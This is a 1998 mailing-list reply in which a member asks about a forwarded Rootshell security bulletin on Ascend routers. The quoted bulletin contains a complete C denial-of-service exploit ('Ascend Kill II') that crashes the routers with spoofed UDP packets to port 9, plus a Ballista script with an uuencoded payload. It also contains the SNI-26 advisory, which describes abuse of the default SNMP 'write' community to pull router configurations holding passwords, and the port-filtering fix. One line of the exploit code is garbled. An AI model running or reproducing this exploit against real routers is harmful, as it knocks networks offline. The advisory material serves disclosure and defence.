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Re: (ASCEND) [rootshell] Security Bulletin #16 (fwd)

Hi all

Although I am not really new on the list, sometimes I am really puzzled
about the info. Can anybody explain what this is and if it is necessary
to do something with it?



Kit Knox wrote:
> This should be of interest to everyone on this list.
> ---------------------------------------------------------------------
> Security Bulletin #16
> March 16th, 1998
> [ ]
> Contents
> --------
> 01. Ascend Kill II - C version
> 02. Ascend Kill II - Ballista "cape" version
> 03. SNI-26: Ascend Router Security Issues
> 01. Ascend Kill II - C version
> ------------------------------
> /*
>  * Ascend Kill II - C version
>  *
>  * (C) 1998 Rootshell - <>
>  *
>  * Distribute freely.
>  *
>  * Released: 3/16/98
>  *
>  * Thanks to Secure Networks.  See SNI-26: Ascend Router Security Issues
>  * (
>  *
>  * Sends a specially constructed UDP packet on the discard port (9)
>  * which cause Ascend routers to reboot.  (Warning! Ascend routers will
>  * process these if they are broadcast packets.)
>  *
>  * Compiled under RedHat 5.0 with glibc.
>  *
>  * NOTE: This program is NOT to be used for malicous purposes.  This is
>  *       intenteded for educational purposes only.  By using this program
>  *       you agree to use this for lawfull purposes ONLY.
>  *
>  * It is worth mentioning that Ascend has known about this bug for quite
>  * some time.
>  *
>  * Fix:
>  *
>  * Filter inbound UDP on port 9.
>  *
>  */
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <netinet/in_systm.h>
> #include <netinet/ip.h>
> #include <linux/udp.h>
> #include <netdb.h>
> #define err(x) { fprintf(stderr, x); exit(1); }
> #define errs(x, y) { fprintf(stderr, x, y); exit(1); }
> /* This magic packet was taken from the Java Configurator */
> char ascend_data[] =
>   {
>     0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
>     0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
>     0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
>     0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
>     0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
>     0x50, 0x41, 0x53, 0x53};
> unsigned short
> in_cksum (addr, len)
>      u_short *addr;
>      int len;
> {
>   register int nleft = len;
>   register u_short *w = addr;
>   register int sum = 0;
>   u_short answer = 0;
>   while (nleft > 1)
>     {
>       sum += *w++;
>       nleft -= 2;
>     }
>   if (nleft == 1)
>     {
>       *(u_char *) (&answer) = *(u_char *) w;
>       sum += answer;
>     }
>   sum = (sum >> 16) + (sum & 0xffff);
>   sum += (sum >> 16);
>   answer = ~sum;
>   return (answer);
> }
> int
> sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport)
>      struct sockaddr_in *sin;
>      unsigned short int s, datalen, sport, dport;
>      unsigned long int saddr, daddr;
>      char *data;
> {
>   struct iphdr ip;
>   struct udphdr udp;
>   static char packet[8192];
>   char crashme[500];
>   int i;
>   ip.ihl = 5;
>   ip.version = 4;
>   ip.tos = rand () % 100;;
>   ip.tot_len = htons (28 + datalen);
> = htons (31337 + (rand () % 100));
>   ip.frag_off = 0;
>   ip.ttl = 255;
>   ip.protocol = IPPROTO_UDP;
>   ip.check = 0;
>   ip.saddr = saddr;
>   ip.daddr = daddr;
>   ip.check = in_cksum ((char *) &ip, sizeof (ip));
>   udp.source = htons (sport);
>   udp.dest = htons (dport);
>   udp.len = htons (8 + datalen);
>   udp.check = (short) 0;
>   memcpy (packet, (char *) &ip, sizeof (ip));
>   memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp));
>   memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen);
>   /* Append random garbage to the packet, without this the router
>      will think this is a valid probe packet and reply. */
>   for (i = 0; i < 500; i++)
>     crashme[i] = rand () % 255;
>   memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500);
>   return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0,
>                   (struct sockaddr *) sin, sizeof (struct sockaddr_in)));
> }
> unsigned int
> lookup (host)
>      char *host;
> {
>   unsigned int addr;
>   struct hostent *he;
>   addr = inet_addr (host);
>   if (addr == -1)
>     {
>       he = gethostbyname (host);
>       if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
>         return 0;
>       bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
>     }
>   return (addr);
> }
> void
> main (argc, argv)
>      int argc;
>      char **argv;
> {
>   unsigned int saddr, daddr;
>   struct sockaddr_in sin;
>   int s, i;
>   if (argc != 3)
>     errs ("Usage: %s <source_addr> <dest_addr>\n", argv[0]);
>   if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
>     err ("Unable to open raw socket.\n");
>   if (!(saddr = lookup (argv[1])))
>     err ("Unable to lookup source address.\n");
>   if (!(daddr = lookup (argv[2])))
>     err ("Unable to lookup destination address.\n");
>   sin.sin_family = AF_INET;
>   sin.sin_port = 9;
>   sin.sin_addr.s_addr = daddr;
>   if ((sendpkt_udp (&sin, s, &ascend_data, sizeof (ascend_data), saddr, daddr, 9, 9)) == -1)
>     {
>       perror ("sendpkt_udp");
>       err ("Error sending the UDP packet.\n");
>     }
> }
> 02. Ascend Kill II - Ballista "cape" version
> --------------------------------------------
> Secure Networks makes security auditing software called Ballista.  It has
> its own scripting language called cape.  Here is a version of Ascend Kill II
> written in cape.  Check out how small it is!
> -- cut here --
> iface=le0
> # Enter your default gateway
> gateway=
> ip
> # Source IP of packet
> ip_src=
> # Address of Ascend router
> ip_dst=
> ip_version=4
> ip_proto=IPPROTO_UDP
> ip_flags=0
> ip_done
> udp
> udp_sport=9
> udp_dport=9
> udp_done
> data_file=ascend_data
> end_of_packet
> -- cut here --
> Here is the data that cape needs.  It is uuencoded.
> begin 644 ascend_data.uue
> M   'H@@2S/VD@0     2-%9X__________\ 3D%-14Y!345.04U%3D%-1?]0
> M05-35T]21%!!4U-73U)$4$%34V9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F
> M9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F
> M9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F
> M9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F
> 99F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F9F
> end
> 03. SNI-26: Ascend Router Security Issues
> -----------------------------------------
>                        ######    ##   ##    ######
>                        ##        ###  ##      ##
>                        ######    ## # ##      ##
>                            ##    ##  ###      ##
>                        ###### .  ##   ## .  ######.
>                            Secure Networks Inc.
>                             Security Advisory
>                              March 16,  1998
>               Security Issues with Ascend Routing Hardware
> - -----------------------------------------------------------------------------
> Ascend Communications provides several popular routing and access-server
> solution, including the Pipeline access router and the MAX access server.
> Due to problems in the Ascend operating system that runs on these
> platforms, it is possible to deny service to networks that depend on them.
> Additionally, knowledge of the SNMP "write" community (which defaults to
> "write") enables an attacker to download the entire configuration file of
> the router, which contains access passwords and other sensitive
> information.
> - -----------------------------------------------------------------------------
> Ascend provides a configuration tool for their equipment which enables
> operators to reconfigure routers via a graphical interface. This tool is
> called the "Ascend Java Configurator". The Ascend Configurator is capable
> of locating Ascend routers on a network, using a special probe protocol.
> In order to locate Ascend routers, the Configurator broadcasts a specially
> formatted UDP packet to the "discard" port (port 9). Ascend routers listen
> for these packets and respond with another UDP packet that contains the
> symbolic name of the router. In this manner, the Configurator can build
> a list of all Ascend routers on the local network.
> By sending a specially formatted malformed probe packet to the discard
> port of an Ascend router, an attacker can cause an Ascend router to lock
> up. Attackers can easily discover Ascend routers to crash by sending probe
> packets to the discard port of arbitrary ranges of addresses; only Ascend
> routers will respond to them.
> - -----------------------------------------------------------------------------
> Ascend routers are manageable by the SNMP protocol. Ascend's SNMP support
> includes the ability to read and write MIB variables. Ascend's SNMP system
> is protected by the SNMP community definitions, which act as passwords for
> SNMP access. By default, the SNMP "read" password is "public", and the
> SNMP "write" password is "write". An attacker that can guess the SNMP
> "read" community can read arbitrary MIB variables, and an attacker that
> can guess the "write" community can set arbitrary MIB variables to new
> values.
> Ascend provides a vendor-specific extension MIB. This MIB includes
> variables specific to Ascend equipment. Among these variables is a group
> of settings called "sysConfigTftp", which allow the configuration of the
> router to be manipulated via the TFTP protocol. By writing to these
> variables with SNMP "set" messages, an attacker can download the entire
> configuration of the Ascend router.
> The full configuration of an Ascend router includes the telnet password
> (knowledge of which allows an attacker to gain telnet access to the Ascend
> menu interface), all the enhanced access passwords (allowing an attacker
> to reconfigure the router from the menu interface), network protocol
> authentication keys (including RADIUS and OSPF keys), usernames and
> passwords for incoming connections, and usernames, passwords, and dial-up
> phone numbers for outgoing connections. All of this information is in
> plaintext.
> An attacker with full access to an Ascend router can also use it to
> "sniff" the networks it is attached to. Ascend routers have an extensive
> (and largely undocumented) debugging interface; functions are included in
> this interface to obtain hexadecimal dumps of raw Ethernet, ISDN, DS1, and
> modem traffic.
> - -----------------------------------------------------------------------------
> These issues are known to be relevant to Ascend Pipeline and MAX
> networking equipment. These vulnerabilities have been confirmed in
> Ascend's operating system at version 5.0Ap42 (MAX) and 5.0A (Pipeline).
> Ascend's 6.0 operating system disables SNMP "write" access by default.
> Previous versions of the software enable SNMP "write" access with a
> default community of "write".
> - -----------------------------------------------------------------------------
> The denial-of-service issue detailed in this advisory is due to an
> implementation flaw in Ascend's software. While no immediate fix is
> available, it is possible to work around this problem by filtering out
> packets to the UDP discard port (9).
> Because SNMP "write" access on an Ascend router is equivalent to complete
> administrative access, it is very important that the community chosen is
> hard to guess. Deployed Ascend equipment should be checked to ensure that
> default (or easily guessed) communities are not in use.
> The SNMP configuration of an Ascend router is available through the
> menuing system, as "Ethernet...Mod Config...SNMP Options...".
> - -----------------------------------------------------------------------------
> These issues were identified originally by Jennifer Myers and
> Thomas H. Ptacek at Secure Networks, Inc. SNI thanks Kit Knox
> of CONNECTnet INS, Inc. for his assistance with this work.
> Information about Ascend Communications is available at their website
> at Products mentioned in this advisory are
> trademarks of Ascend.
> - -----------------------------------------------------------------------------
> Secure Networks, Inc. (SNI) is a security research and development company
> based in Calgary, Alberta, Canada. SNI is the largest independent source
> of full-disclosure security advisories and new vulnerability information
> in the world. For more information about this or other advisories, contact
> us at <>. A PGP key is provided if privacy is required.
> For the full text of this and all of SNI's other advisories, see our web
> page at "". General information about SNI
> is available at "".
> - -----------------------------------------------------------------------------
> he contents of this advisory are Copyright (C) 1998 Secure Networks
> Inc, and may be distributed freely provided that no fee is charged for
> distribution, and that proper credit is given.
> - -----------------------------------------------------------------------------
> Type Bits/KeyID    Date       User ID
> pub  1024/9E55000D 1997/01/13 Secure Networks Inc. <>
>                               Secure Networks <>
> Version: 2.6.3ia
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> =DchE
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> Version: 2.6.2
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> 7u2y0xhd1hcMc169ASew9fsiNP38VXCeYoxCSpCu4Wd42PT8avZIbGmPR9BgnhgP
> dzLlygd7Hhs=
> =+Y/d
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